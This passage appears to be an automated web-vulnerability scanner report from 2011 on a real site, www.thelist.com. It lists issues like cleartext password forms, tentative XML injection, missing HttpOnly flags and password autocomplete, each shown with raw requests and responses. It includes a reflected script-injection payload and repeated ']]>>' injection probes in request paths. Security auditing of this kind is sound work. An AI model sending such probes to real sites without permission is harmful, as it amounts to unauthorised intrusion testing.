Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=1aef4ce19b0c7295ffe34788ae8d2b26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27599


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 -->
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.thelist.com/add.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<br>
<FORM action="/add.php" method="post">
<TABLE cellpadding="15" cellspacing="0" border="0" width="100%" bgcolor="#F2F2F2">
...[SNIP]...
<td><input type="password" name="person-password" size="20" maxlength="50" value=""></td>
...[SNIP]...

3.2. http://www.thelist.com/update.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
<P>

<FORM ACTION="/update.php" METHOD="POST">
<TABLE WIDTH=450 CELLPADDING=5 border="1" align="center">
...[SNIP]...
<BR>
<input type="password" size="30" name="password"><BR>
...[SNIP]...

4. XML injection  previous  next
There are 9 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


4.1. http://www.thelist.com/add.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /add.php]]>> HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:03:13 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.2. http://www.thelist.com/areacode.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /areacode.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /areacode.html]]>> HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:04:34 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.3. http://www.thelist.com/countrycode.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /countrycode.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /countrycode.html]]>> HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:05:09 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.4. http://www.thelist.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /index.html]]>> HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:04:04 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.5. http://www.thelist.com/misc/canada/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /misc]]>>/canada/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:06:52 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.6. http://www.thelist.com/misc/canada/ [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /misc/canada]]>>/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:07:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.7. http://www.thelist.com/misc/usa/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /misc]]>>/usa/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:04:56 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.8. http://www.thelist.com/misc/usa/ [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /misc/usa]]>>/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:05:46 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

4.9. http://www.thelist.com/update.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /update.php]]>> HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 17:04:55 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...
<a class="btn_search" href="http://www.devx.com/xml/Door/7050">XML Zone</a>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.thelist.com/add.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...

5.2. http://www.thelist.com/update.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...

6. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://www.thelist.com/add.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<br>
<FORM action="/add.php" method="post">
<TABLE cellpadding="15" cellspacing="0" border="0" width="100%" bgcolor="#F2F2F2">
...[SNIP]...
<td><input type="password" name="person-password" size="20" maxlength="50" value=""></td>
...[SNIP]...

6.2. http://www.thelist.com/update.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
<P>

<FORM ACTION="/update.php" METHOD="POST">
<TABLE WIDTH=450 CELLPADDING=5 border="1" align="center">
...[SNIP]...
<BR>
<input type="password" size="30" name="password"><BR>
...[SNIP]...

7. Cross-domain POST  previous  next
There are 22 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


7.1. http://www.thelist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
